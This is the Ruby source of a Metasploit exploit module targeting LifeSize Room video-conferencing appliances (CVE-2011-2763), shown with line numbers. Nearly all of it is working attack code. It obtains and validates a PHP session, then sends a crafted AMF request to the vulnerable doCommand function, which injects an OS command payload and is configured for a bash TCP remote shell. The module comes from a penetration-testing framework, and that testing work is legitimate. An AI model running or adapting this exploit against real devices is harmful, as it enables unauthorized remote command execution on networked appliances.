Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpClient
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'LifeSize Room Command Injection',
14
      'Description'    => %q{
15
          This module exploits a vulnerable resource in LifeSize
16
        Room versions 3.5.3 and 4.7.18 to inject OS commands.  LifeSize
17
        Room is an appliance and thus the environment is limited
18
        resulting in a small set of payload options.
19
      },
20
      'Author'	=>
21
        [
22
          # SecureState R&D Team - Special Thanks To Chris Murrey
23
          'Spencer McIntyre',
24
        ],
25
      'License'        => MSF_LICENSE,
26
      'References'     =>
27
        [
28
          [ 'CVE', '2011-2763' ],
29
          [ 'OSVDB', '75212' ],
30
        ],
31
      'Privileged'     => false,
32
      'Payload'        =>
33
        {
34
          'DisableNops' => true,
35
          'Space'       => 65535,	# limited by the two byte size in the AMF encoding
36
          'Compat'      =>
37
            {
38
              'PayloadType' => 'cmd cmd_bash',
39
              'RequiredCmd' => 'generic bash-tcp',
40
            }
41
        },
42
      'Platform'       => [ 'unix' ],
43
      'Arch'           => ARCH_CMD,
44
      'Targets'        => [ [ 'Automatic', { } ] ],
45
      'DisclosureDate' => '2011-07-13',
46
      'DefaultTarget'  => 0,
47
      'Notes'          =>
48
        {
49
          'Stability'   => [ CRASH_SAFE, ],
50
          'Reliability' => [ REPEATABLE_SESSION, ],
51
        },
52
    ))
53
  end
54

55
  def exploit
56
    print_status("Requesting PHP Session...")
57
    res = send_request_cgi({
58
      'encode'    => false,
59
      'uri'       => "/interface/interface.php?uniqueKey=#{rand_text_numeric(13)}",
60
      'method'    => 'GET',
61
    }, 10)
62

63
    if res.nil? || res.get_cookies.empty?
64
      fail_with(Failure::NotFound, 'Could not obtain a Session ID')
65
    end
66

67
    sessionid = 'PHPSESSID=' << res.get_cookies.split('PHPSESSID=')[1].split('; ')[0]
68

69
    headers = {
70
      'Cookie'        => sessionid,
71
      'Content-Type'  => 'application/x-amf',
72
    }
73

74
    print_status("Validating PHP Session...")
75

76
    data  = "\x00\x00\x00\x00\x00\x02\x00\x1b"
77
    data << "LSRoom_Remoting.amfphpLogin"
78
    data << "\x00\x02/1\x00\x00\x00"
79
    data << "\x05\x0a\x00\x00\x00\x00\x00\x17"
80
    data << "LSRoom_Remoting.getHost"
81
    data << "\x00\x02\x2f\x32\x00\x00\x00\x05\x0a\x00\x00\x00\x00"
82

83
    res = send_request_cgi({
84
        'encode'    => false,
85
        'uri'       => '/gateway.php',
86
        'data'      => data,
87
        'method'    => 'POST',
88
        'headers'   => headers,
89
    }, 10)
90

91
    if not res
92
      fail_with(Failure::NotFound, 'Could not validate the Session ID')
93
      return
94
    end
95

96
    print_status("Sending Malicious POST Request...")
97

98
    # This is the amf data for the request to the vulnerable function LSRoom_Remoting.doCommand
99
    amf_data =  "\x00\x00\x00\x00\x00\x01\x00\x19"
100
    amf_data << "LSRoom_Remoting.doCommand"
101
    amf_data << "\x00\x02\x2f\x37\xff\xff\xff\xff"
102
    amf_data << "\x0a\x00\x00\x00\x02\x02#{[payload.encoded.length].pack('n')}#{payload.encoded}"
103
    amf_data << "\x02\x00\x0dupgradeStatus"
104

105
    res = send_request_cgi({
106
        'encode'    => false,
107
        'uri'       => '/gateway.php?' << sessionid,
108
        'data'      => amf_data,
109
        'method'    => 'POST',
110
        'headers'   => headers
111
    }, 10)
112
  end
113
end
114

115